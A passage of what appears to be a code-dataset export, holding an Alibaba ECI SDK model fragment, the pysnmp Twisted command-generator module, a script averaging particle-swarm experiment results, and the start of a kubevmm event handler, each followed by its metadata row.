        """Serialize to the wire-format dict (None lists/models stay None)."""
        result = {key: getattr(self, attr) for attr, key in self._SCALARS}
        for attr, key in self._MODEL_LIST_KEYS:
            items = getattr(self, attr)
            result[key] = ([item.to_map() if item else None for item in items]
                           if items is not None else None)
        result['DnsConfig'] = self.dns_config.to_map() if self.dns_config is not None else None
        result['EciSecurityContext'] = (self.eci_security_context.to_map()
                                        if self.eci_security_context is not None else None)
        return result

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining.

        ``map`` is never mutated, so the mutable default is harmless.
        """
        for attr, key in self._SCALARS:
            setattr(self, attr, map.get(key))
        model_lists = (
            ('tags', 'Tags', DescribeContainerGroupsResponseContainerGroupsTags),
            ('events', 'Events', DescribeContainerGroupsResponseContainerGroupsEvents),
            ('containers', 'Containers', DescribeContainerGroupsResponseContainerGroupsContainers),
            ('volumes', 'Volumes', DescribeContainerGroupsResponseContainerGroupsVolumes),
            ('init_containers', 'InitContainers',
             DescribeContainerGroupsResponseContainerGroupsInitContainers),
            ('host_aliases', 'HostAliases',
             DescribeContainerGroupsResponseContainerGroupsHostAliases),
        )
        for attr, key, model_cls in model_lists:
            raw = map.get(key)
            setattr(self, attr,
                    [model_cls().from_map(item) for item in raw] if raw is not None else None)
        raw = map.get('DnsConfig')
        self.dns_config = (DescribeContainerGroupsResponseContainerGroupsDnsConfig().from_map(raw)
                           if raw is not None else None)
        raw = map.get('EciSecurityContext')
        self.eci_security_context = (
            DescribeContainerGroupsResponseContainerGroupsEciSecurityContext().from_map(raw)
            if raw is not None else None)
        return self
class DeleteContainerGroupRequest(TeaModel):
    """Request model for the DeleteContainerGroup API call."""

    def __init__(self, region_id=None, container_group_id=None, client_token=None):
        self.region_id = region_id                    # required
        self.container_group_id = container_group_id  # required
        self.client_token = client_token              # optional (not validated)

    def validate(self):
        # ClientToken is deliberately left unvalidated.
        self.validate_required(self.region_id, 'region_id')
        self.validate_required(self.container_group_id, 'container_group_id')

    def to_map(self):
        """Serialize to the wire-format dict."""
        return {
            'RegionId': self.region_id,
            'ContainerGroupId': self.container_group_id,
            'ClientToken': self.client_token,
        }

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        for attr, key in (('region_id', 'RegionId'),
                          ('container_group_id', 'ContainerGroupId'),
                          ('client_token', 'ClientToken')):
            setattr(self, attr, map.get(key))
        return self
class DeleteContainerGroupResponse(TeaModel):
    """Response model for the DeleteContainerGroup API call (request id only)."""

    def __init__(self, request_id=None):
        self.request_id = request_id  # required

    def validate(self):
        self.validate_required(self.request_id, 'request_id')

    def to_map(self):
        """Serialize to the wire-format dict."""
        return {'RequestId': self.request_id}

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        self.request_id = map.get('RequestId')
        return self
| 37.480004
| 1,142
| 0.625799
| 41,850
| 373,938
| 5.376177
| 0.019403
| 0.031441
| 0.068535
| 0.082243
| 0.784918
| 0.757259
| 0.723378
| 0.701195
| 0.666403
| 0.651091
| 0
| 0.000316
| 0.271195
| 373,938
| 9,976
| 1,143
| 37.483761
| 0.825262
| 0.000136
| 0
| 0.816746
| 1
| 0
| 0.08577
| 0.008043
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108612
| false
| 0.005681
| 0.000114
| 0
| 0.190184
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c51d0684da4363cd6456e177110a64663958ddd4
| 21,212
|
py
|
Python
|
build/piman.app/pysnmp/hlapi/twisted/cmdgen.py
|
jackgisel/team-athens
|
91e2aa810c0064f8b6b39ee53c3b05f037e0aeb0
|
[
"Apache-2.0"
] | null | null | null |
build/piman.app/pysnmp/hlapi/twisted/cmdgen.py
|
jackgisel/team-athens
|
91e2aa810c0064f8b6b39ee53c3b05f037e0aeb0
|
[
"Apache-2.0"
] | null | null | null |
build/piman.app/pysnmp/hlapi/twisted/cmdgen.py
|
jackgisel/team-athens
|
91e2aa810c0064f8b6b39ee53c3b05f037e0aeb0
|
[
"Apache-2.0"
] | null | null | null |
#
# This file is part of pysnmp software.
#
# Copyright (c) 2005-2019, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pysnmp/license.html
#
import sys
from pysnmp.smi.rfc1902 import *
from pysnmp.hlapi.auth import *
from pysnmp.hlapi.context import *
from pysnmp.hlapi.lcd import *
from pysnmp.hlapi.varbinds import *
from pysnmp.hlapi.twisted.transport import *
from pysnmp.entity.rfc3413 import cmdgen
from pysnmp.proto import errind
from twisted.internet.defer import Deferred
from twisted.python.failure import Failure
__all__ = ['getCmd', 'nextCmd', 'setCmd', 'bulkCmd', 'isEndOfMib']
# Module-level helpers shared by all command generators below.
vbProcessor = CommandGeneratorVarBinds()
lcd = CommandGeneratorLcdConfigurator()


def isEndOfMib(varBinds):
    """Return True if *varBinds* indicates the end of the MIB view.

    Fix: replaces a lambda bound to a name (PEP 8 E731) with a proper
    ``def`` — identical behavior, better tracebacks and introspection.
    """
    return not cmdgen.getNextVarBinds(varBinds)[1]
def getCmd(snmpEngine, authData, transportTarget, contextData,
           *varBinds, **options):
    r"""Performs SNMP GET query.

    Based on passed parameters, prepares SNMP GET packet
    (:RFC:`1905#section-4.2.1`) and schedules its transmission by
    :mod:`twisted` I/O framework at a later point of time.

    Parameters
    ----------
    snmpEngine : :class:`~pysnmp.hlapi.SnmpEngine`
        Class instance representing SNMP engine.

    authData : :class:`~pysnmp.hlapi.CommunityData` or :class:`~pysnmp.hlapi.UsmUserData`
        Class instance representing SNMP credentials.

    transportTarget : :class:`~pysnmp.hlapi.twisted.UdpTransportTarget` or :class:`~pysnmp.hlapi.twisted.Udp6TransportTarget`
        Class instance representing transport type along with SNMP peer address.

    contextData : :class:`~pysnmp.hlapi.ContextData`
        Class instance representing SNMP ContextEngineId and ContextName values.

    \*varBinds : :class:`~pysnmp.smi.rfc1902.ObjectType`
        One or more class instances representing MIB variables to place
        into SNMP request.

    Other Parameters
    ----------------
    \*\*options :
        Request options:

            * `lookupMib` - load MIB and resolve response MIB variables at
              the cost of slightly reduced performance. Default is `True`.

    Returns
    -------
    deferred : :class:`~twisted.internet.defer.Deferred`
        Twisted Deferred object representing work-in-progress. User
        is expected to attach his own `success` and `error` callback
        functions to the Deferred object though
        :meth:`~twisted.internet.defer.Deferred.addCallbacks` method.

    Raises
    ------
    PySnmpError
        Or its derivative indicating that an error occurred while
        performing SNMP operation.

    Notes
    -----
    User `success` callback is called with the following tuple as
    its first argument:

    * errorStatus (str) : True value indicates SNMP PDU error.
    * errorIndex (int) : Non-zero value refers to `varBinds[errorIndex-1]`
    * varBinds (tuple) : A sequence of
      :class:`~pysnmp.smi.rfc1902.ObjectType` class instances representing
      MIB variables returned in SNMP response.

    User `error` callback is called with `errorIndication` object wrapped
    in :class:`~twisted.python.failure.Failure` object.

    Examples
    --------
    >>> from twisted.internet.task import react
    >>> from pysnmp.hlapi.twisted import *
    >>>
    >>> def success(args):
    ...     (errorStatus, errorIndex, varBinds) = args
    ...     print(errorStatus, errorIndex, varBinds)
    ...
    >>> def failure(errorIndication):
    ...     print(errorIndication)
    ...
    >>> def run(reactor):
    ...     d = getCmd(SnmpEngine(),
    ...                CommunityData('public'),
    ...                UdpTransportTarget(('demo.snmplabs.com', 161)),
    ...                ContextData(),
    ...                ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))
    ...     d.addCallback(success).addErrback(failure)
    ...     return d
    ...
    >>> react(run)
    (0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))])
    >>>
    """
    def __cbFun(snmpEngine, sendRequestHandle,
                errorIndication, errorStatus, errorIndex,
                varBinds, cbCtx):
        # Bridge the low-level engine callback into Deferred semantics.
        lookupMib, deferred = cbCtx

        if errorIndication:
            deferred.errback(Failure(errorIndication))
            return

        try:
            varBindsUnmade = vbProcessor.unmakeVarBinds(
                snmpEngine, varBinds, lookupMib)

        except Exception as ex:
            # Resolving response var-binds (e.g. MIB lookup) may fail;
            # surface the exception through the errback chain.
            deferred.errback(Failure(ex))

        else:
            deferred.callback((errorStatus, errorIndex, varBindsUnmade))

    addrName, paramsName = lcd.configure(
        snmpEngine, authData, transportTarget, contextData.contextName)

    deferred = Deferred()

    cmdgen.GetCommandGenerator().sendVarBinds(
        snmpEngine, addrName, contextData.contextEngineId,
        contextData.contextName,
        vbProcessor.makeVarBinds(snmpEngine, varBinds), __cbFun,
        (options.get('lookupMib', True), deferred)
    )

    return deferred
def setCmd(snmpEngine, authData, transportTarget, contextData,
           *varBinds, **options):
    r"""Performs SNMP SET query.

    Based on passed parameters, prepares SNMP SET packet
    (:RFC:`1905#section-4.2.5`) and schedules its transmission by
    :mod:`twisted` I/O framework at a later point of time.

    Parameters
    ----------
    snmpEngine : :class:`~pysnmp.hlapi.SnmpEngine`
        Class instance representing SNMP engine.

    authData : :class:`~pysnmp.hlapi.CommunityData` or :class:`~pysnmp.hlapi.UsmUserData`
        Class instance representing SNMP credentials.

    transportTarget : :class:`~pysnmp.hlapi.twisted.UdpTransportTarget` or :class:`~pysnmp.hlapi.twisted.Udp6TransportTarget`
        Class instance representing transport type along with SNMP peer address.

    contextData : :class:`~pysnmp.hlapi.ContextData`
        Class instance representing SNMP ContextEngineId and ContextName values.

    \*varBinds : :class:`~pysnmp.smi.rfc1902.ObjectType`
        One or more class instances representing MIB variables to place
        into SNMP request.

    Other Parameters
    ----------------
    \*\*options :
        Request options:

            * `lookupMib` - load MIB and resolve response MIB variables at
              the cost of slightly reduced performance. Default is `True`.

    Returns
    -------
    deferred : :class:`~twisted.internet.defer.Deferred`
        Twisted Deferred object representing work-in-progress. User
        is expected to attach his own `success` and `error` callback
        functions to the Deferred object though
        :meth:`~twisted.internet.defer.Deferred.addCallbacks` method.

    Raises
    ------
    PySnmpError
        Or its derivative indicating that an error occurred while
        performing SNMP operation.

    Notes
    -----
    User `success` callback is called with the following tuple as
    its first argument:

    * errorStatus (str) : True value indicates SNMP PDU error.
    * errorIndex (int) : Non-zero value refers to `varBinds[errorIndex-1]`
    * varBinds (tuple) : A sequence of
      :class:`~pysnmp.smi.rfc1902.ObjectType` class instances representing
      MIB variables returned in SNMP response.

    User `error` callback is called with `errorIndication` object wrapped
    in :class:`~twisted.python.failure.Failure` object.

    Examples
    --------
    >>> from twisted.internet.task import react
    >>> from pysnmp.hlapi.twisted import *
    >>>
    >>> def success(args):
    ...     (errorStatus, errorIndex, varBinds) = args
    ...     print(errorStatus, errorIndex, varBinds)
    ...
    >>> def failure(errorIndication):
    ...     print(errorIndication)
    ...
    >>> def run(reactor):
    ...     d = setCmd(SnmpEngine(),
    ...                CommunityData('public'),
    ...                UdpTransportTarget(('demo.snmplabs.com', 161)),
    ...                ContextData(),
    ...                ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0), 'Linux i386'))
    ...     d.addCallback(success).addErrback(failure)
    ...     return d
    ...
    >>> react(run)
    (0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('Linux i386'))])
    >>>
    """
    def __cbFun(snmpEngine, sendRequestHandle,
                errorIndication, errorStatus, errorIndex,
                varBinds, cbCtx):
        # Bridge the low-level engine callback into Deferred semantics.
        lookupMib, deferred = cbCtx

        if errorIndication:
            deferred.errback(Failure(errorIndication))
            return

        try:
            varBindsUnmade = vbProcessor.unmakeVarBinds(
                snmpEngine, varBinds, lookupMib)

        except Exception as ex:
            # Resolving response var-binds (e.g. MIB lookup) may fail;
            # surface the exception through the errback chain.
            deferred.errback(Failure(ex))

        else:
            deferred.callback((errorStatus, errorIndex, varBindsUnmade))

    addrName, paramsName = lcd.configure(
        snmpEngine, authData, transportTarget, contextData.contextName)

    deferred = Deferred()

    cmdgen.SetCommandGenerator().sendVarBinds(
        snmpEngine, addrName, contextData.contextEngineId,
        contextData.contextName,
        vbProcessor.makeVarBinds(snmpEngine, varBinds), __cbFun,
        (options.get('lookupMib', True), deferred)
    )

    return deferred
def nextCmd(snmpEngine, authData, transportTarget, contextData,
            *varBinds, **options):
    r"""Performs SNMP GETNEXT query.

    Based on passed parameters, prepares SNMP GETNEXT packet
    (:RFC:`1905#section-4.2.2`) and schedules its transmission by
    :mod:`twisted` I/O framework at a later point of time.

    Parameters
    ----------
    snmpEngine : :class:`~pysnmp.hlapi.SnmpEngine`
        Class instance representing SNMP engine.

    authData : :class:`~pysnmp.hlapi.CommunityData` or :class:`~pysnmp.hlapi.UsmUserData`
        Class instance representing SNMP credentials.

    transportTarget : :class:`~pysnmp.hlapi.twisted.UdpTransportTarget` or :class:`~pysnmp.hlapi.twisted.Udp6TransportTarget`
        Class instance representing transport type along with SNMP peer address.

    contextData : :class:`~pysnmp.hlapi.ContextData`
        Class instance representing SNMP ContextEngineId and ContextName values.

    \*varBinds : :class:`~pysnmp.smi.rfc1902.ObjectType`
        One or more class instances representing MIB variables to place
        into SNMP request.

    Other Parameters
    ----------------
    \*\*options :
        Request options:

            * `lookupMib` - load MIB and resolve response MIB variables at
              the cost of slightly reduced performance. Default is `True`.
            * `ignoreNonIncreasingOid` - continue iteration even if response
              MIB variables (OIDs) are not greater then request MIB variables.
              Be aware that setting it to `True` may cause infinite loop between
              SNMP management and agent applications. Default is `False`.

    Returns
    -------
    deferred : :class:`~twisted.internet.defer.Deferred`
        Twisted Deferred object representing work-in-progress. User
        is expected to attach his own `success` and `error` callback
        functions to the Deferred object though
        :meth:`~twisted.internet.defer.Deferred.addCallbacks` method.

    Raises
    ------
    PySnmpError
        Or its derivative indicating that an error occurred while
        performing SNMP operation.

    Notes
    -----
    User `success` callback is called with the following tuple as
    its first argument:

    * errorStatus (str) : True value indicates SNMP PDU error.
    * errorIndex (int) : Non-zero value refers to `varBinds[errorIndex-1]`
    * varBinds (tuple) :
      A sequence of sequences (e.g. 2-D array) of
      :py:class:`~pysnmp.smi.rfc1902.ObjectType` class instances
      representing a table of MIB variables returned in SNMP response.
      Inner sequences represent table rows and ordered exactly the same
      as `varBinds` in request. Response to GETNEXT always contain
      a single row.

    User `error` callback is called with `errorIndication` object wrapped
    in :class:`~twisted.python.failure.Failure` object.

    Examples
    --------
    >>> from twisted.internet.task import react
    >>> from pysnmp.hlapi.twisted import *
    >>>
    >>> def success(args):
    ...     (errorStatus, errorIndex, varBindTable) = args
    ...     print(errorStatus, errorIndex, varBindTable)
    ...
    >>> def failure(errorIndication):
    ...     print(errorIndication)
    ...
    >>> def run(reactor):
    ...     d = nextCmd(SnmpEngine(),
    ...                 CommunityData('public'),
    ...                 UdpTransportTarget(('demo.snmplabs.com', 161)),
    ...                 ContextData(),
    ...                 ObjectType(ObjectIdentity('SNMPv2-MIB', 'system')))
    ...     d.addCallback(success).addErrback(failure)
    ...     return d
    ...
    >>> react(run)
    (0, 0, [[ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))]])
    >>>
    """
    def __cbFun(snmpEngine, sendRequestHandle,
                errorIndication, errorStatus, errorIndex,
                varBindTable, cbCtx):
        # Bridge the low-level engine callback into Deferred semantics.
        lookupMib, deferred = cbCtx

        # Optionally tolerate agents that return non-increasing OIDs.
        if (options.get('ignoreNonIncreasingOid', False) and
                errorIndication and
                isinstance(errorIndication, errind.OidNotIncreasing)):
            errorIndication = None

        if errorIndication:
            deferred.errback(Failure(errorIndication))
            return

        try:
            varBindsUnmade = [
                vbProcessor.unmakeVarBinds(snmpEngine, varBindTableRow, lookupMib)
                for varBindTableRow in varBindTable
            ]

        except Exception as ex:
            # Resolving response var-binds (e.g. MIB lookup) may fail;
            # surface the exception through the errback chain.
            deferred.errback(Failure(ex))

        else:
            deferred.callback((errorStatus, errorIndex, varBindsUnmade))

    addrName, paramsName = lcd.configure(
        snmpEngine, authData, transportTarget, contextData.contextName)

    deferred = Deferred()

    cmdgen.NextCommandGenerator().sendVarBinds(
        snmpEngine, addrName, contextData.contextEngineId,
        contextData.contextName,
        vbProcessor.makeVarBinds(snmpEngine, varBinds), __cbFun,
        (options.get('lookupMib', True), deferred)
    )

    return deferred
def bulkCmd(snmpEngine, authData, transportTarget, contextData,
            nonRepeaters, maxRepetitions, *varBinds, **options):
    r"""Performs SNMP GETBULK query.

    Based on passed parameters, prepares SNMP GETNEXT packet
    (:RFC:`1905#section-4.2.3`) and schedules its transmission by
    :mod:`twisted` I/O framework at a later point of time.

    Parameters
    ----------
    snmpEngine : :class:`~pysnmp.hlapi.SnmpEngine`
        Class instance representing SNMP engine.

    authData : :class:`~pysnmp.hlapi.CommunityData` or :class:`~pysnmp.hlapi.UsmUserData`
        Class instance representing SNMP credentials.

    transportTarget : :class:`~pysnmp.hlapi.twisted.UdpTransportTarget` or :class:`~pysnmp.hlapi.twisted.Udp6TransportTarget`
        Class instance representing transport type along with SNMP peer address.

    contextData : :class:`~pysnmp.hlapi.ContextData`
        Class instance representing SNMP ContextEngineId and ContextName values.

    nonRepeaters : int
        One MIB variable is requested in response for the first
        `nonRepeaters` MIB variables in request.

    maxRepetitions : int
        `maxRepetitions` MIB variables are requested in response for each
        of the remaining MIB variables in the request (e.g. excluding
        `nonRepeaters`). Remote SNMP engine may choose lesser value than
        requested.

    \*varBinds : :class:`~pysnmp.smi.rfc1902.ObjectType`
        One or more class instances representing MIB variables to place
        into SNMP request.

    Other Parameters
    ----------------
    \*\*options :
        Request options:

            * `lookupMib` - load MIB and resolve response MIB variables at
              the cost of slightly reduced performance. Default is `True`.
            * `ignoreNonIncreasingOid` - continue iteration even if response
              MIB variables (OIDs) are not greater then request MIB variables.
              Be aware that setting it to `True` may cause infinite loop between
              SNMP management and agent applications. Default is `False`.

    Returns
    -------
    deferred : :class:`~twisted.internet.defer.Deferred`
        Twisted Deferred object representing work-in-progress. User
        is expected to attach his own `success` and `error` callback
        functions to the Deferred object though
        :meth:`~twisted.internet.defer.Deferred.addCallbacks` method.

    Raises
    ------
    PySnmpError
        Or its derivative indicating that an error occurred while
        performing SNMP operation.

    Notes
    -----
    User `success` callback is called with the following tuple as
    its first argument:

    * errorStatus (str) : True value indicates SNMP PDU error.
    * errorIndex (int) : Non-zero value refers to `varBinds[errorIndex-1]`
    * varBindTable (tuple):
      A sequence of sequences (e.g. 2-D array) of
      :py:class:`~pysnmp.smi.rfc1902.ObjectType` class instances representing a
      table of MIB variables returned in SNMP response, with up to
      ``maxRepetitions`` rows, i.e. ``len(varBindTable) <= maxRepetitions``.

      For ``0 <= i < len(varBindTable)`` and ``0 <= j < len(varBinds)``,
      ``varBindTable[i][j]`` represents:

      - For non-repeaters (``j < nonRepeaters``), the first lexicographic
        successor of ``varBinds[j]``, regardless the value of ``i``, or an
        :py:class:`~pysnmp.smi.rfc1902.ObjectType` instance with the
        :py:obj:`~pysnmp.proto.rfc1905.endOfMibView` value if no such successor
        exists;
      - For repeaters (``j >= nonRepeaters``), the ``i``-th lexicographic
        successor of ``varBinds[j]``, or an
        :py:class:`~pysnmp.smi.rfc1902.ObjectType` instance with the
        :py:obj:`~pysnmp.proto.rfc1905.endOfMibView` value if no such successor
        exists.

      See :rfc:`3416#section-4.2.3` for details on the underlying
      ``GetBulkRequest-PDU`` and the associated ``GetResponse-PDU``, such as
      specific conditions under which the server may truncate the response,
      causing ``varBindTable`` to have less than ``maxRepetitions`` rows.

    User `error` callback is called with `errorIndication` object wrapped
    in :class:`~twisted.python.failure.Failure` object.

    Examples
    --------
    >>> from twisted.internet.task import react
    >>> from pysnmp.hlapi.twisted import *
    >>>
    >>> def success(args):
    ...     (errorStatus, errorIndex, varBindTable) = args
    ...     print(errorStatus, errorIndex, varBindTable)
    ...
    >>> def failure(errorIndication):
    ...     print(errorIndication)
    ...
    >>> def run(reactor):
    ...     d = bulkCmd(SnmpEngine(),
    ...                 CommunityData('public'),
    ...                 UdpTransportTarget(('demo.snmplabs.com', 161)),
    ...                 ContextData(),
    ...                 0, 2,
    ...                 ObjectType(ObjectIdentity('SNMPv2-MIB', 'system')))
    ...     d.addCallback(success).addErrback(failure)
    ...     return d
    ...
    >>> react(run)
    (0, 0, [[ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))], [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.2.0')), ObjectIdentifier('1.3.6.1.4.1.424242.1.1'))]])
    >>>
    """
    def __cbFun(snmpEngine, sendRequestHandle,
                errorIndication, errorStatus, errorIndex,
                varBindTable, cbCtx):
        # Bridge the low-level engine callback into Deferred semantics.
        lookupMib, deferred = cbCtx

        # Optionally tolerate agents that return non-increasing OIDs
        # (same parenthesized form as in nextCmd for consistency).
        if (options.get('ignoreNonIncreasingOid', False) and
                errorIndication and
                isinstance(errorIndication, errind.OidNotIncreasing)):
            errorIndication = None

        if errorIndication:
            deferred.errback(Failure(errorIndication))
            return

        try:
            varBindsUnmade = [
                vbProcessor.unmakeVarBinds(snmpEngine, varBindTableRow, lookupMib)
                for varBindTableRow in varBindTable
            ]

        except Exception as ex:
            # Resolving response var-binds (e.g. MIB lookup) may fail;
            # surface the exception through the errback chain.
            deferred.errback(Failure(ex))

        else:
            deferred.callback((errorStatus, errorIndex, varBindsUnmade))

    addrName, paramsName = lcd.configure(
        snmpEngine, authData, transportTarget, contextData.contextName)

    deferred = Deferred()

    cmdgen.BulkCommandGenerator().sendVarBinds(
        snmpEngine, addrName, contextData.contextEngineId,
        contextData.contextName, nonRepeaters, maxRepetitions,
        vbProcessor.makeVarBinds(snmpEngine, varBinds),
        __cbFun,
        (options.get('lookupMib', True), deferred)
    )

    return deferred
| 38.21982
| 241
| 0.637752
| 2,140
| 21,212
| 6.308879
| 0.150935
| 0.027702
| 0.028442
| 0.025776
| 0.871639
| 0.866751
| 0.863492
| 0.851789
| 0.836012
| 0.830383
| 0
| 0.014352
| 0.254337
| 21,212
| 554
| 242
| 38.288809
| 0.839224
| 0.658259
| 0
| 0.734848
| 0
| 0
| 0.019532
| 0.007409
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.083333
| 0
| 0.174242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c548b596be5b903e276b1a2a262f293110545231
| 6,765
|
py
|
Python
|
Base_PSO/Visualization/mean_value_second_app.py
|
NuriaValls/PSO-2RW-Applications
|
129b75ec72fcb32bc9bf43c0ad3bf55c44423092
|
[
"MIT"
] | null | null | null |
Base_PSO/Visualization/mean_value_second_app.py
|
NuriaValls/PSO-2RW-Applications
|
129b75ec72fcb32bc9bf43c0ad3bf55c44423092
|
[
"MIT"
] | null | null | null |
Base_PSO/Visualization/mean_value_second_app.py
|
NuriaValls/PSO-2RW-Applications
|
129b75ec72fcb32bc9bf43c0ad3bf55c44423092
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import numpy as np
import math
from scipy.stats import gaussian_kde
def _read_triplets(paths):
    """Parse the data files into three parallel (fitness, iterations, time) series.

    Each comma-separated entry on a line holds ``"fitness iterations time"``;
    entries are distributed round-robin across the three series, and the
    round-robin counter deliberately carries over from one file to the next
    (matching the original script's behavior, where ``i`` was never reset).

    Returns a list of three ``(fit, ite, tim)`` list-triples.
    """
    series = [([], [], []) for _ in range(3)]
    which = 0
    for path in paths:
        # Fix: the original opened ten files and never closed any of them;
        # a context manager guarantees each handle is released.
        with open(path) as fh:
            for line in fh:
                for entry in line.rstrip('\n').split(','):
                    fields = entry.split(' ')
                    fit, ite, tim = series[which]
                    fit.append(float(fields[0]))
                    ite.append(int(fields[1]))
                    tim.append(float(fields[2]))
                    which = (which + 1) % 3


    return series


def _report(fit, ite, tim):
    """Print mean/std of fitness, iterations and per-iteration time.

    Fix: the original hard-coded the divisor 220; deriving it from the
    series length gives identical output for the expected 220-sample data
    set while staying correct for other sizes.
    """
    n = len(fit)
    print(sum(fit) / n)
    print(np.std(fit))
    print(sum(ite) / n)
    print(np.std(ite))
    per_iter = [t / k for t, k in zip(tim, ite)]
    print(sum(per_iter) / n)
    print(np.std(per_iter))


def main():
    """Load all ten result files and print summary statistics per series.

    Fix: collapses ten copy-pasted file-reading loops into one data-driven
    loop, and moves the work behind a ``__main__`` guard so importing the
    module no longer triggers file I/O.
    """
    paths = ['first_approach_data_aux_%d.txt' % k for k in range(1, 11)]
    triplets = _read_triplets(paths)
    (fit1, ite1, tim1), (fit2, ite2, tim2), (fit3, ite3, tim3) = triplets

    print(len(fit1))
    _report(fit1, ite1, tim1)
    print('\n')
    _report(fit2, ite2, tim2)
    print('\n')
    _report(fit3, ite3, tim3)


if __name__ == '__main__':
    main()
| 23.489583
| 46
| 0.458684
| 1,003
| 6,765
| 3.040877
| 0.071785
| 0.216393
| 0.236066
| 0.127869
| 0.806885
| 0.728197
| 0.728197
| 0.728197
| 0.728197
| 0.728197
| 0
| 0.078317
| 0.363932
| 6,765
| 288
| 47
| 23.489583
| 0.63049
| 0
| 0
| 0.795918
| 0
| 0
| 0.049512
| 0.043009
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020408
| 0
| 0.020408
| 0.085714
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c57831f0b68e42c790073293dc9fe0d1603a8963
| 63,142
|
py
|
Python
|
virt/core/virtlet/services/os_event_handler.py
|
kubesys/kubevmm
|
de19303a24e1c1abe4b410732843d4c474f742c5
|
[
"Apache-2.0"
] | 2
|
2021-09-13T07:35:51.000Z
|
2022-01-27T14:42:57.000Z
|
virt/core/virtlet/services/os_event_handler.py
|
kubesys/kube-vmm
|
de19303a24e1c1abe4b410732843d4c474f742c5
|
[
"Apache-2.0"
] | null | null | null |
virt/core/virtlet/services/os_event_handler.py
|
kubesys/kube-vmm
|
de19303a24e1c1abe4b410732843d4c474f742c5
|
[
"Apache-2.0"
] | 2
|
2019-07-15T10:12:18.000Z
|
2019-07-16T07:55:31.000Z
|
# -*- coding: utf-8 -*-
'''
Copyright (2021, ) Institute of Software, Chinese Academy of Sciences
@author: wuyuewen@otcaix.iscas.ac.cn
@author: wuheng@otcaix.iscas.ac.cn
'''
import json
'''
Import python libs
'''
import os
import time
import traceback
import sys
from json import loads
from json import dumps
from xml.etree.ElementTree import fromstring
'''
Import third party libs
'''
from watchdog.observers import Observer
from watchdog.events import *
from kubernetes import client, config
from kubernetes.client.rest import ApiException
from kubernetes.client import V1DeleteOptions
from xmljson import badgerfish as bf
'''
Import local libs
'''
from utils.libvirt_util import get_pool_path, get_volume_path, refresh_pool, get_volume_xml, get_snapshot_xml, is_vm_exists, get_xml, \
vm_state, _get_all_pool_path, get_vol_info_by_qemu
from utils import logger
from utils import constants
from utils.misc import create_custom_object, delete_custom_object, get_custom_object, update_custom_object, add_spec_in_volume, updateDescription, addSnapshots, get_volume_snapshots, runCmdRaiseException, \
addPowerStatusMessage, updateDomainSnapshot, updateDomain, report_failure, get_hostname_in_lower_case, \
DiskImageHelper
# Kubernetes custom-resource API coordinates, all sourced from the
# project-wide constants module.
GROUP = constants.KUBERNETES_GROUP
VERSION = constants.KUBERNETES_API_VERSION
# CRD "kind" names for VM-related resources (VM, disk, disk snapshot,
# disk image, VM snapshot, device, image).
VM_KIND = constants.KUBERNETES_KIND_VM
VMD_KIND = constants.KUBERNETES_KIND_VMD
VMDSN_KIND = constants.KUBERNETES_KIND_VMDSN
VMDI_KIND = constants.KUBERNETES_KIND_VMDI
VMSN_KIND = constants.KUBERNETES_KIND_VMSN
VMDEV_KIND = constants.KUBERNETES_KIND_VMDEV
VMI_KIND = constants.KUBERNETES_KIND_VMI
# Path of the in-cluster service-account token file.
TOKEN = constants.KUBERNETES_TOKEN_FILE
# CRD "plural" names used when addressing the custom-object REST API.
PLURAL_VM = constants.KUBERNETES_PLURAL_VM
PLURAL_VM_DISK = constants.KUBERNETES_PLURAL_VMD
PLURAL_VM_DISK_SS = constants.KUBERNETES_PLURAL_VMDSN
PLURAL_VM_DISK_IMAGE = constants.KUBERNETES_PLURAL_VMDI
# Local filesystem locations for libvirt domain XML and VM disk templates.
LIBVIRT_XML_DIR = constants.KUBEVMM_LIBVIRT_VM_XML_DIR
VMD_TEMPLATE_DIR = constants.KUBEVMM_DEFAULT_VMDI_DIR
# Lower-cased hostname of this node, used as the CRD "host" label below.
HOSTNAME = get_hostname_in_lower_case()
# NOTE(review): this rebinds the imported `logger` module name to a Logger
# instance configured for the virtlet log file — intentional but surprising.
logger = logger.set_logger(os.path.basename(__file__), constants.KUBEVMM_VIRTLET_LOG)
def xmlToJson(xmlStr):
    """Convert an XML string to pretty-printed JSON (badgerfish convention)."""
    element = fromstring(xmlStr)
    as_mapping = bf.data(element)
    return dumps(as_mapping, sort_keys=True, indent=4)
def toKubeJson(json):
